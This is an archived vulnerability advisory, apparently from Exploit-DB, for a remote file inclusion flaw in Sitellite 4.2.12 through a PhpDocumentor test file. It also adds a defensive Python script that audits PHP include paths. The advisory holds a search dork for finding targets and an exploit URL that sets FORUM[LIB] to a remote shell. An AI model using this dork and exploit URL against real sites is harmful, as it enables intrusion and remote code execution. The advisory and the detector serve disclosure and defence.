Vendor: Sitellite
By: o0xxdark0o
CVSS: N/A
Severity: HIGH
Type: Remote File Inclusion
CWE: Not mentioned
Product Name: Sitellite
Affected Version From: Sitellite version 4.2.12 and below
Affected Version To: Sitellite version 4.2.12
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
2007

Sitellite Remote File Inclusion Vulnerability

Sitellite is affected by a remote file inclusion vulnerability in a bundled PhpDocumentor test file, which builds a require_once path from $FORUM['LIB']. An attacker can exploit this to include arbitrary remote files, which may lead to remote code execution or other attacks.

Mitigation:

Apply the latest patches and updates from the vendor. Ensure that proper input validation and sanitization techniques are implemented to prevent remote file inclusion vulnerabilities.
Source

Exploit-DB raw data:

*sitellite*<http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz>
v 4.2.12
DORK : "powered by Sitellite"
FOUND BY : o0xxdark0o
           o0xxdark0o[at]msn.com
Website: http://www.sitellite.org/
DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
REMOTE FILE INCLUDE
############################################################
FILE :
PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php
############################################################
EXP:
xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell
?
############################################################
CODE: on line 4
<?php
/** @package tests */
/** include tests */
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
require PEAR . 'test' . 'me';
include('file.ext');
include 'file.ext';
include(PEAR . 'test' . 'me');
?>
############################################################
thanks for all my friends.. str0ke ... mr_6.1.9 .... oxdo .... cold z3ro
www.hach-teach.org - www.3asfh.com
############################################################
BY : o0xxdark0o
     o0xxdark0o@msn.com

PhpDocumentor directory is .htaccess'ed

# milw0rm.com [2007-06-14]
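
A defender-side audit for the pattern shown in the advisory above, as an added example that is not part of the original advisory or of Sitellite's code: it flags include/require paths built from request superglobals or from a variable the file never assigns, which is what leaves $FORUM['LIB'] caller-controlled where PHP's register_globals is enabled. The names audit_includes, ADVISORY_FILE and FIXED_FILE are this example's own, FIXED_FILE is a constructed counterpart, and the check is a regex heuristic rather than a PHP parser.

```python
import re

# An include/require statement and its path expression, up to the closing ';'
INCLUDE_RE = re.compile(r"(?<![\w$>])(?:include|require)(?:_once)?\b\s*\(?([^;]*);", re.I)
VAR_RE = re.compile(r"\$([A-Za-z_]\w*)")
REQUEST_VARS = {"_GET", "_POST", "_REQUEST", "_COOKIE"}

def strip_comments(src):
    """Blank out PHP comments but keep newlines so line numbers stay valid."""
    src = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group().count("\n"), src, flags=re.S)
    return re.sub(r"(?m)^[ \t]*(?://|#).*$", "", src)

def audit_includes(src):
    """Return (line, variable, reason) for include paths built from request
    data or from a variable the file never assigns before using it."""
    code = strip_comments(src)
    findings = []
    for m in INCLUDE_RE.finditer(code):
        line = code.count("\n", 0, m.start()) + 1
        expr = re.sub(r"'[^']*'", "", m.group(1))  # single-quoted text holds no variables
        for name in VAR_RE.findall(expr):
            assigned = re.search(r"\$" + name + r"\s*(?:\[[^\]]*\]\s*)*=(?!=)", code[:m.start()])
            if name in REQUEST_VARS:
                findings.append((line, name, "request data"))
            elif not assigned:
                findings.append((line, name, "never assigned"))
    return findings

# The file as quoted in the advisory above.
ADVISORY_FILE = """<?php
/** @package tests */
/** include tests */
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
require PEAR . 'test' . 'me';
include('file.ext');
include 'file.ext';
include(PEAR . 'test' . 'me');
?>
"""

# Constructed counterpart: the path variable is set in the file itself.
FIXED_FILE = """<?php
$FORUM = array('LIB' => dirname(__FILE__) . '/lib');
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
"""

if __name__ == "__main__":
    for line, name, reason in audit_includes(ADVISORY_FILE):
        print(f"line {line}: include path uses ${name} ({reason})")
```

Run over a deployed tree, the same function also surfaces bundled test and documentation fixtures like this one, which are candidates for removal from the web root.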